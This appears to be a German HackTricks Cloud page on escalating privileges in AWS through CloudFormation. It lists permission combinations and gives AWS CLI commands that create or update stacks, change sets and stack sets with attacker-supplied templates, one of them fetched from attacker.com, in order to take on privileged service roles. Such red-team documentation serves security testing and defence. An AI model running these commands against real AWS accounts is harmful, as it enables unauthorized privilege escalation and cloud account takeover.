AWS - Cloudformation Privesc

Lerne & übe AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lerne & übe GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Überprüfe die Abonnementpläne!
Tritt der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folge uns auf Twitter 🐦 @hacktricks_live.
Teile Hacking-Tricks, indem du PRs zu den HackTricks und HackTricks Cloud GitHub-Repos einreichst.

cloudformation

Für weitere Informationen über cloudformation siehe:

AWS - CloudFormation & Codestar Enum

`iam:PassRole`, `cloudformation:CreateStack`

Ein Angreifer mit diesen Berechtigungen kann Privilegien eskalieren, indem er einen CloudFormation-Stack mit einer benutzerdefinierten Vorlage erstellt, die auf seinem Server gehostet wird, um Aktionen unter den Berechtigungen einer bestimmten Rolle auszuführen:

aws cloudformation create-stack --stack-name <stack-name> \
--template-url http://attacker.com/attackers.template \
--role-arn <arn-role>

In der folgenden Seite haben Sie ein Exploitation-Beispiel mit der zusätzlichen Berechtigung cloudformation:DescribeStacks:

iam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Potenzielle Auswirkungen: Privesc auf die angegebene Cloudformation-Service-Rolle.

`iam:PassRole`, (`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`)

In diesem Fall können Sie eine bestehende Cloudformation-Stack ausnutzen, um sie zu aktualisieren und Privilegien wie im vorherigen Szenario zu eskalieren:

aws cloudformation update-stack \
--stack-name privesc \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::91029364722:role/CloudFormationAdmin2 \
--capabilities CAPABILITY_IAM \
--region eu-west-1

Die cloudformation:SetStackPolicy Berechtigung kann verwendet werden, um sich selbst die UpdateStack Berechtigung für einen Stack zu geben und den Angriff durchzuführen.

Potenzielle Auswirkungen: Privesc auf die angegebene cloudformation-Dienstrolle.

`cloudformation:UpdateStack` | `cloudformation:SetStackPolicy`

Wenn Sie diese Berechtigung haben, aber kein iam:PassRole, können Sie dennoch die verwendeten Stacks aktualisieren und die IAM-Rollen, die bereits angehängt sind, missbrauchen. Überprüfen Sie den vorherigen Abschnitt für ein Exploit-Beispiel (geben Sie einfach keine Rolle in der Aktualisierung an).

Die cloudformation:SetStackPolicy Berechtigung kann verwendet werden, um sich selbst die UpdateStack Berechtigung für einen Stack zu geben und den Angriff durchzuführen.

Potenzielle Auswirkungen: Privesc auf die bereits angehängte cloudformation-Dienstrolle.

`iam:PassRole`,((`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

Ein Angreifer mit Berechtigungen, um eine Rolle zu übergeben und ein ChangeSet zu erstellen & auszuführen, kann einen neuen cloudformation-Stack erstellen/aktualisieren und die cloudformation-Dienstrollen missbrauchen, genau wie bei CreateStack oder UpdateStack.

Der folgende Exploit ist eine Variation des CreateStack Exploits, die die ChangeSet-Berechtigungen verwendet, um einen Stack zu erstellen.

aws cloudformation create-change-set \
--stack-name privesc \
--change-set-name privesc \
--change-set-type CREATE \
--template-url https://privescbucket.s3.amazonaws.com/IAMCreateUserTemplate.json \
--role arn:aws:iam::947247140022:role/CloudFormationAdmin \
--capabilities CAPABILITY_IAM \
--region eu-west-1

echo "Waiting 2 mins to change the stack"
sleep 120

aws cloudformation execute-change-set \
--change-set-name privesc \
--stack-name privesc \
--region eu-west-1

echo "Waiting 2 mins to execute the stack"
sleep 120

aws cloudformation describe-stacks \
--stack-name privesc \
--region eu-west-1

Die cloudformation:SetStackPolicy Berechtigung kann verwendet werden, um sich selbst ChangeSet Berechtigungen über einen Stack zu geben und den Angriff durchzuführen.

Potenzielle Auswirkungen: Privesc zu cloudformation Dienstrollen.

(`cloudformation:CreateChangeSet`, `cloudformation:ExecuteChangeSet`) | `cloudformation:SetStackPolicy`)

Dies ist wie die vorherige Methode, ohne IAM-Rollen zu übergeben, sodass Sie einfach bereits angehängte verwenden können, ändern Sie einfach den Parameter:

--change-set-type UPDATE

Potenzielle Auswirkungen: Privesc auf die bereits angehängte Cloudformation-Service-Rolle.

`iam:PassRole`,(`cloudformation:CreateStackSet` | `cloudformation:UpdateStackSet`)

Ein Angreifer könnte diese Berechtigungen missbrauchen, um StackSets zu erstellen/aktualisieren und willkürliche Cloudformation-Rollen auszunutzen.

Potenzielle Auswirkungen: Privesc auf Cloudformation-Service-Rollen.

`cloudformation:UpdateStackSet`

Ein Angreifer könnte diese Berechtigung ohne die passRole-Berechtigung missbrauchen, um StackSets zu aktualisieren und die angehängten Cloudformation-Rollen auszunutzen.

Potenzielle Auswirkungen: Privesc auf die angehängten Cloudformation-Rollen.

Referenzen

https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/

Lernen & üben Sie AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Lernen & üben Sie GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Unterstützen Sie HackTricks

Überprüfen Sie die Abonnementpläne!
Treten Sie der 💬 Discord-Gruppe oder der Telegram-Gruppe bei oder folgen Sie uns auf Twitter 🐦 @hacktricks_live.
Teilen Sie Hacking-Tricks, indem Sie PRs an die HackTricks und HackTricks Cloud GitHub-Repos senden.

Previousiam:PassRole, codestar:CreateProject Nextiam:PassRole, cloudformation:CreateStack,and cloudformation:DescribeStacks

Last updated 1 month ago

cloudformation

iam:PassRole, cloudformation:CreateStack

iam:PassRole, (cloudformation:UpdateStack | cloudformation:SetStackPolicy)

cloudformation:UpdateStack | cloudformation:SetStackPolicy

iam:PassRole,((cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

(cloudformation:CreateChangeSet, cloudformation:ExecuteChangeSet) | cloudformation:SetStackPolicy)

iam:PassRole,(cloudformation:CreateStackSet | cloudformation:UpdateStackSet)

cloudformation:UpdateStackSet